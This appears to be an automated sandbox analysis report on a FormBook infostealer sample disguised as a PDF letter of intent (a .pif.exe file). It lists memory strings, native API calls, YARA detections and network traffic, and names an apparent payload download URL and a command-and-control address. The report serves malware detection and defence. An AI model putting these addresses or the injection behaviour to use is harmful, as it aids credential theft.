20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: d5e43bac-84e2-4431-93f6-27b896edd65cx-runtime: 0.035128content-length: 27234connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
            Source: ybjXXpYwhPHZD.exe, 00000007.00000002.3110054215.00000000050F7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.newhopetoday.app
            Source: ybjXXpYwhPHZD.exe, 00000007.00000002.3110054215.00000000050F7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.newhopetoday.app/f83s/
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
            Source: xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
            Source: xwizard.exe, 00000006.00000002.3107060521.0000000002A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: xwizard.exe, 00000006.00000002.3107060521.0000000002A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: xwizard.exe, 00000006.00000002.3107060521.0000000002A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: xwizard.exe, 00000006.00000002.3107060521.0000000002A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: xwizard.exe, 00000006.00000002.3107060521.0000000002A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: xwizard.exe, 00000006.00000003.2527873903.0000000007AF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352587861.0000000002CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.evolutioncosmetics.com/
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383059837.0000000032380000.00000004.00001000.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2253237778.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352587861.0000000002C78000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352648578.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352587861.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2253398404.0000000002CC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.evolutioncosmetics.com/quarantin/luiKzhysatQzs26.bin
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352587861.0000000002CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.evolutioncosmetics.com/quarantin/luiKzhysatQzs26.bin6
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352587861.0000000002C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.evolutioncosmetics.com/quarantin/luiKzhysatQzs26.binH
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownHTTPS traffic detected: 69.27.100.185:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_00405139 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405139

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000006.00000002.3108057800.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2383463131.0000000032C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2383897911.0000000035AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3108123087.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3110054215.0000000005050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD35C0 NtCreateMutant,LdrInitializeThunk,2_2_32FD35C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_32FD2C70
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_32FD2DF0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD3090 NtSetValueKey,2_2_32FD3090
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD3010 NtOpenDirectoryObject,2_2_32FD3010
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD39B0 NtGetContextThread,2_2_32FD39B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD3D70 NtOpenThread,2_2_32FD3D70
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD3D10 NtOpenProcessToken,2_2_32FD3D10
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD4340 NtSetContextThread,2_2_32FD4340
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD4650 NtSuspendThread,2_2_32FD4650
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2AF0 NtWriteFile,2_2_32FD2AF0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2AD0 NtReadFile,2_2_32FD2AD0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2AB0 NtWaitForSingleObject,2_2_32FD2AB0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2BF0 NtAllocateVirtualMemory,2_2_32FD2BF0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2BE0 NtQueryValueKey,2_2_32FD2BE0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2BA0 NtEnumerateValueKey,2_2_32FD2BA0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2B80 NtQueryInformationFile,2_2_32FD2B80
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2B60 NtClose,2_2_32FD2B60
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2EE0 NtQueueApcThread,2_2_32FD2EE0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2EA0 NtAdjustPrivilegesToken,2_2_32FD2EA0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2E80 NtReadVirtualMemory,2_2_32FD2E80
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2E30 NtWriteVirtualMemory,2_2_32FD2E30
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2FE0 NtCreateFile,2_2_32FD2FE0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2FB0 NtResumeThread,2_2_32FD2FB0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2FA0 NtQuerySection,2_2_32FD2FA0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2F90 NtProtectVirtualMemory,2_2_32FD2F90
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2F60 NtCreateProcessEx,2_2_32FD2F60
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2F30 NtCreateSection,2_2_32FD2F30
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2CF0 NtOpenProcess,2_2_32FD2CF0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2CC0 NtQueryVirtualMemory,2_2_32FD2CC0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2CA0 NtQueryInformationToken,2_2_32FD2CA0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2C60 NtCreateKey,2_2_32FD2C60
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2C00 NtQueryInformationProcess,2_2_32FD2C00
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2DD0 NtDelayExecution,2_2_32FD2DD0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2DB0 NtEnumerateKey,2_2_32FD2DB0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2D30 NtUnmapViewOfSection,2_2_32FD2D30
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2D10 NtMapViewOfSection,2_2_32FD2D10
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2D00 NtSetInformationFile,2_2_32FD2D00
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D4650 NtSuspendThread,LdrInitializeThunk,6_2_047D4650
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D4340 NtSetContextThread,LdrInitializeThunk,6_2_047D4340
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_047D2C70
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2C60 NtCreateKey,LdrInitializeThunk,6_2_047D2C60
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_047D2CA0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_047D2D30
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_047D2D10
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_047D2DF0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2DD0 NtDelayExecution,LdrInitializeThunk,6_2_047D2DD0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_047D2EE0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_047D2E80
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2F30 NtCreateSection,LdrInitializeThunk,6_2_047D2F30
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2FE0 NtCreateFile,LdrInitializeThunk,6_2_047D2FE0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2FB0 NtResumeThread,LdrInitializeThunk,6_2_047D2FB0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2AF0 NtWriteFile,LdrInitializeThunk,6_2_047D2AF0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2AD0 NtReadFile,LdrInitializeThunk,6_2_047D2AD0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2B60 NtClose,LdrInitializeThunk,6_2_047D2B60
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_047D2BF0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_047D2BE0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_047D2BA0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D35C0 NtCreateMutant,LdrInitializeThunk,6_2_047D35C0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D39B0 NtGetContextThread,LdrInitializeThunk,6_2_047D39B0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2C00 NtQueryInformationProcess,6_2_047D2C00
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2CF0 NtOpenProcess,6_2_047D2CF0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2CC0 NtQueryVirtualMemory,6_2_047D2CC0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2D00 NtSetInformationFile,6_2_047D2D00
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2DB0 NtEnumerateKey,6_2_047D2DB0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2E30 NtWriteVirtualMemory,6_2_047D2E30
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2EA0 NtAdjustPrivilegesToken,6_2_047D2EA0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2F60 NtCreateProcessEx,6_2_047D2F60
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2FA0 NtQuerySection,6_2_047D2FA0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2F90 NtProtectVirtualMemory,6_2_047D2F90
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2AB0 NtWaitForSingleObject,6_2_047D2AB0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D2B80 NtQueryInformationFile,6_2_047D2B80
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D3010 NtOpenDirectoryObject,6_2_047D3010
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D3090 NtSetValueKey,6_2_047D3090
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D3D70 NtOpenThread,6_2_047D3D70
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D3D10 NtOpenProcessToken,6_2_047D3D10
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028C92D0 NtCreateFile,6_2_028C92D0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028C9720 NtAllocateVirtualMemory,6_2_028C9720
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028C9430 NtReadFile,6_2_028C9430
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028C95C0 NtClose,6_2_028C95C0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028C9520 NtDeleteFile,6_2_028C9520
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04ABF0A1 NtQueryInformationProcess,6_2_04ABF0A1
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_004031DD EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,0_2_004031DD
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_004049760_2_00404976
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_004064EC0_2_004064EC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBD2F02_2_32FBD2F0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305132D2_2_3305132D
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBB2C02_2_32FBB2C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA52A02_2_32FA52A0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FE739A2_2_32FE739A
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8D34C2_2_32F8D34C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330412ED2_2_330412ED
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA70C02_2_32FA70C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3306B16B2_2_3306B16B
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAB1B02_2_32FAB1B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F1722_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD516C2_2_32FD516C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304F0CC2_2_3304F0CC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305F0E02_2_3305F0E0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330570E92_2_330570E9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305F7B02_2_3305F7B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330516CC2_2_330516CC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330575712_2_33057571
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F914602_2_32F91460
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303D5B02_2_3303D5B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305F43F2_2_3305F43F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FE5AA02_2_32FE5AA0
